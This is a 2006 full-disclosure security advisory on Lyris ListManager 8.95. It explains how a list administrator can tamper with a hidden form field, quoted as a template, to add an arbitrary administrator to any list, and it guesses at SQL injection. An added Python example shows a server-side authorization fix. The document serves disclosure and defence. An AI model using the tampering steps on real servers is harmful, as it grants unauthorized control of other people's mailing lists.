
List:       full-disclosure
Subject:    [Full-disclosure] Lyris ListManager 8.95: Add arbitrary
From:       Design Properly <designsoftwareproperly () yahoo ! com>
Date:       2006-08-31 4:14:27
Message-ID: 20060831041427.10614.qmail () web58311 ! mail ! re3 ! yahoo ! com


Advisory: Lyris ListManager 8.95: Add arbitrary administrator to arbitrary list
Release Date: 2006-08-30
Application: Lyris ListManager 8.95
Risk: Depends upon your use and business context
Vendor site: http://www.lyris.com/

Overview of Product:
    "Lyris ListManager is the world's most popular software for creating, sending, and tracking
highly effective email campaigns, newsletters, and discussion groups."
http://www.lyris.com/products/index.html

Details of this Vulnerability:
    A design flaw in ListManager's web-based administrative interface allows anyone who is an
administrator of a list on the server to add an arbitrary user as an administrator to any other
list hosted on the same server.  Specifically, the form one fills out to add an administrator
contains a hidden form field with the name of the list to which the administrator will be
added.  By changing this value and submitting the form (using tools like Tamper Data for
Firefox), you can add an arbitrary user as an administrator for an arbitrary list.

    Here is a sample of these hidden form fields:

    <!-- START OF - save cgi variables in hidden fields -->
    <input type="hidden" name="MEMBERS_.AppNeeded_" value="F">
    <input type="hidden" name="MEMBERS_.CleanAuto_" value="F">
    <input type="hidden" name="MEMBERS_.DateJoined_" value="2006-08-30 20:20:32">
    <input type="hidden" name="MEMBERS_.EnableWYSIWYG_" value="T">
    <input type="hidden" name="MEMBERS_.IsListAdm_" value="T">
    <input type="hidden" name="MEMBERS_.List_" value="[INSERT TARGET LIST HERE]">
    <input type="hidden" name="MEMBERS_.MailFormat_" value="M">
    <input type="hidden" name="MEMBERS_.MemberType_" value="normal">
    <input type="hidden" name="MEMBERS_.NoRepro_" value="F">
    <input type="hidden" name="MEMBERS_.NotifySubm_" value="T">
    <input type="hidden" name="MEMBERS_.NumAppNeed_" value="0">
    <input type="hidden" name="MEMBERS_.RcvAdmMail_" value="T">
    <input type="hidden" name="MEMBERS_.ReadsHtml_" value="F">
    <input type="hidden" name="MEMBERS_.ReceiveAck_" value="F">
    <input type="hidden" name="MEMBERS_.SubType_" value="mail">
    <input type="hidden" name="current_tab" value="Basics">
    <input type="hidden" name="fields_in_memory" value="FullName_ AppNeeded_ PermissionGroupID_ MemberType_ SubType_ Password_ ExpireDate_ SubType_ CleanAuto_ NoRepro_ UserID_ Comment_ Additional_ ReceiveAck_ NumAppNeed_ List_ DateBounce_ ConfirmDat_ MailFormat_ ReadsHtml_ DateHeld_ DateUnsub_ DateJoined_ UserNameLC_ Domain_ EnableWYSIWYG_ EMAILADDR_ IsListAdm_ RcvAdmMail_ NotifySubm_">
    <input type="hidden" name="table_in_memory" value="MEMBERS_">

Further Work:
    Yesterday I was trying to add a user whose name contained a single-quote, e.g. "O'Conner."
Frequently, as I navigated the web interface, I received SQL errors that printed a large
portion of the SQL query along with details about what failed.  I'm sure there are SQL injection
possibilities here as well; I just don't have time to explore.  And where there are SQL
injection opportunities, there are often opportunities for JavaScript injection.

Recommendations to those using ListManager:
    The risk of this issue to your organization is directly tied to how many administrators you
have on your mailing list server, how much you can really trust them, and the value of your
mailing lists.  That is, a company that has five administrators for a public list shouldn't
care.  However, if you've got a lot of administrators and a few lists whose discussions would
be worth intercepting or disrupting, you're at high risk for abuse as a result of this
vulnerability.  Until the vendor solves this and other issues, you're going to have to have a
high level of trust in the people administering your lists, or use a different mailing list
server.
Best of luck.
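
The server-side authorization check whose absence the advisory describes, shown beside the trusting pattern. This is an added example, not part of the original advisory and not Lyris code. The session layout, the ADMIN_OF table, the list names, the function names and the full form key MEMBERS_.EMAILADDR_ are assumptions made for illustration.

```python
# Added illustration, not Lyris code. Session layout, ADMIN_OF, list names and
# function names are hypothetical. MEMBERS_.List_ and MEMBERS_.IsListAdm_ are
# the hidden fields quoted in the advisory; MEMBERS_.EMAILADDR_ is an assumed
# key (only EMAILADDR_ appears in fields_in_memory).

class Forbidden(Exception):
    """The session is not authorized for the list named in the request."""

# Constructed sample data: the lists each authenticated admin administers.
ADMIN_OF = {
    "alice@example.org": {"newsletter"},
    "bob@example.org": {"newsletter", "board-private"},
}

def _row(form):
    # One member row: (list, address, is_list_admin).
    return (form["MEMBERS_.List_"], form["MEMBERS_.EMAILADDR_"],
            form.get("MEMBERS_.IsListAdm_") == "T")

def save_member_trusting(session, form, members):
    """Pattern described in the advisory: the hidden field alone picks the list."""
    members.append(_row(form))
    return form["MEMBERS_.List_"]

def save_member_checked(session, form, members, audit):
    """Check the submitted list against server-side state before writing."""
    target = form.get("MEMBERS_.List_", "")
    allowed = ADMIN_OF.get(session["user"], set())
    if target not in allowed:
        # A list name the session does not administer means the hidden field
        # was changed after rendering; record it for review, write nothing.
        audit.append({"user": session["user"], "submitted_list": target,
                      "administers": sorted(allowed)})
        raise Forbidden(f"{session['user']} does not administer {target!r}")
    members.append(_row(form))
    return target

if __name__ == "__main__":
    session = {"user": "alice@example.org"}          # constructed session
    form = {"MEMBERS_.List_": "board-private",       # constructed request
            "MEMBERS_.EMAILADDR_": "new.admin@example.org",
            "MEMBERS_.IsListAdm_": "T"}
    rows, audit = [], []
    try:
        save_member_checked(session, form, rows, audit)
    except Forbidden as exc:
        print("rejected:", exc, "| audit:", audit)
```
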

 				


